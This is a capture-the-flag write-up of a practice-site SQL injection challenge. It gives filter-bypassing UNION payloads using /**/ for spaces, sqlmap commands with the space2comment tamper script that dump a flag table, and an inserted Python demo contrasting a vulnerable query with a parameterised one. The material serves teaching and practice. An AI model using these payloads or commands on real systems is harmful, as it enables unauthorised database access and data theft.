Just finished the challenge, and now to tidy things up.
Writing up the solution in the hope that it helps someone who needs it.
All my write-ups (WPs) are written as single articles in this form,
mainly so that readers can read and find them more easily.
I hope you don't mind!! Please share!!!
Yours always, a newbie
Simple SQL injection (Score: 10)
- Source: Experiment Bar
- Difficulty: Medium
- Participants: 18007
- Got the flag: 5644
- Submissions: 6513
- Pass rate: 87%
Obtain the flag value by injection (submission format: flag{}).
Challenge link: http://ctf5.shiyanbar.com/423/web/
Approach: This challenge doesn't cover a lot of ground, but it still taught me something (after all, I'm still new!!).
I solved it in two ways (I hope they give you some ideas).
Method one:
First, a simple manual injection test:
1 and 1=1: usually this returns data normally
1 and 1=2: usually this returns no data, or an error outright
Or
1' and '1'='1: normally this returns data normally
1' and '1'='2: usually this returns no data, or an error outright
If the SQL statement that handles the data in the backend (the backend wraps the input in single quotes) is:
select name from user where id='our_input'
and we enter 1' and '1'='1, the SQL statement becomes:
select name from user where id='1' and '1'='1'
and the backend database still reads the data normally.
If we enter 1' and '1'='2, the SQL statement becomes:
select name from user where id='1' and '1'='2'
The query condition is false, so the database returns no data.
(With the quotes in place, a bare 1 and 1=1 just becomes the string id='1 and 1=1' and tests nothing, which is why the quoted form is needed here.)
Following the injection method above, we first enter 1 and 1=1,
then 1 and 1=1' (with a trailing quote), which gives an error. We then re-enter 1 and 1=1
and find that the "and" is filtered and the space is replaced with a +, so we can infer that this challenge filters common SQL keywords.
Enter union, select and from to test, and you will find they are all filtered too.
At this point you need to know: when spaces are filtered, you can usually use () or /**/ in place of the space.
Then we can dump the databases (the trailing '1'='1 is there to close the quote the backend adds, so the statement stays syntactically valid):
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
You will get:
Next, look for the tables:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
A table named flag is found, so we happily continue and dump the columns of flag:
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1
But that gave an error (QAQ).
So let's look at its contents directly:
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
You will get:
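To make the two steps above concrete (the quoted query that turns 1' and '1'='1 into a true condition, and the /**/ trick that gets a union past the space filter), here is an added example of my own; it is not code from the original write-up or from the challenge. It runs everything against an in-memory SQLite database. Assumptions: the backend query shape select name from user where id='<input>' is the one given above; the filter is a hypothetical stand-in, because the page only reports what it observed (the word and and the spaces disappear, /**/ survives); sqlite_master is used as SQLite's counterpart of MySQL's information_schema.tables, which SQLite does not have; and the user rows and the flag value are constructed for the demo. The hardened_query at the end is the fix a developer would apply, with a bound parameter instead of string concatenation.

```python
"""Added example (not from the original write-up): the injection mechanics
described above, reproduced against an in-memory SQLite database."""
import re
import sqlite3

# Constructed sample data: a user table to inject through and the flag table
# the write-up eventually reads. The flag value is made up for the demo.
SCHEMA = """
create table user(id text, name text);
insert into user values ('1', 'alice'), ('2', 'bob');
create table flag(flag text);
insert into flag values ('flag{constructed_sample_flag}');
"""

# The working payload from the write-up, with /**/ standing in for spaces.
UNION_FLAG = "1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1"
# SQLite analogue of the information_schema.tables step (assumption: the MySQL
# query cannot run here, so sqlite_master is queried for table names instead).
UNION_TABLES = "1'/**/union/**/select/**/name/**/from/**/sqlite_master/**/where/**/'1'='1"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, user_input):
    """The backend as the write-up describes it: the input is wrapped in
    single quotes and concatenated straight into the SQL text."""
    sql = "select name from user where id='%s'" % user_input
    return [row[0] for row in conn.execute(sql)]


def hardened_query(conn, user_input):
    """The same lookup with a bound parameter: the input is data, never SQL,
    so the quote-closing payloads simply match no row."""
    return [row[0] for row in conn.execute(
        "select name from user where id=?", (user_input,))]


def waf_filter(user_input):
    """Hypothetical stand-in for the challenge's filter (the page gives only
    its visible effect): strip every whitespace character and the word `and`."""
    return re.sub(r"\band\b|\s", "", user_input, flags=re.IGNORECASE)


def attack(conn, payload):
    """Run a payload through the filter and then the vulnerable query, the way
    the challenge does. Returns (what reached the database, rows or error)."""
    filtered = waf_filter(payload)
    try:
        rows = vulnerable_query(conn, filtered)
    except sqlite3.Error as exc:
        rows = "error: %s" % exc
    return filtered, rows


if __name__ == "__main__":
    conn = make_db()
    # Why the quoted form is needed: a bare boolean test just becomes a string.
    print(vulnerable_query(conn, "1 and 1=1"))        # []
    print(vulnerable_query(conn, "1' and '1'='1"))    # ['alice']
    print(vulnerable_query(conn, "1' and '1'='2"))    # []
    # What the filter does to the quoted test: the `and` and spaces vanish,
    # leaving a condition that no longer does what the attacker wanted.
    print(attack(conn, "1' and '1'='1"))
    # The comment-separated payloads pass through untouched and still work.
    print(attack(conn, UNION_TABLES))
    print(attack(conn, UNION_FLAG))
    # The parameterised version is immune to the same input.
    print(hardened_query(conn, "1"))                  # ['alice']
    print(hardened_query(conn, "1' and '1'='1"))      # []
```

The point to take from running it: the filter is not what keeps the application safe, because any token separator the SQL parser accepts (/**/ here) defeats it, whereas the parameterised query never lets the quote in the payload become part of the statement at all.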
Method two:
It is also possible to use sqlmap.
Here we use a tamper script. Tamper scripts are written in Python and ship with sqlmap; their main job is to bypass a WAF or input filter. If spaces are filtered you can use space2comment.py (it replaces each space with /**/, exactly what we did by hand above); if the filter is case-sensitive you can use randomcase.py, and so on.
The --level parameter sets how thorough the tests are (1-5, default 1). By default sqlmap tests all GET and POST parameters; when --level is greater than or equal to 2
the HTTP Cookie header is tested as well, and when it is greater than or equal to 3 the User-Agent and Referer headers are tested too.
First dump the databases:
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment --dbs
Where: 1. sqlmap: start sqlmap. 2. -u: the target URL. 3. --tamper: the WAF-bypass script to apply.
4. space2comment: the tamper script that bypasses the space filter. 5. --dbs: enumerate databases.
Then look inside the web1 database:
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 --tables
Where: 1. -D: followed by the database name (capital D; lowercase -d is sqlmap's direct database connection option). 2. --tables: enumerate the tables in that database.
Then continue into the flag table:
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag --columns
Where: 1. -T: followed by the table name. 2. --columns: list the columns in that table.
Finally, dump the flag column with -C and --dump, following the same pattern (the original shows only a screenshot of this last command and its result):
Where: 1. -C: followed by the column name. 2. --dump: dump all records from the table.
If there's anything you don't understand, leave a comment or add me!!!
I'm still a noob, so I'll keep working hard!
I work hard because I don't want to let down the people who care about me!
Putting this together wasn't easy, so if you like it please follow the blog!
I like making friends. My contact details are below:
qq:1263030049
: liu1263030049
Please state your reason when adding me as a friend, thank you.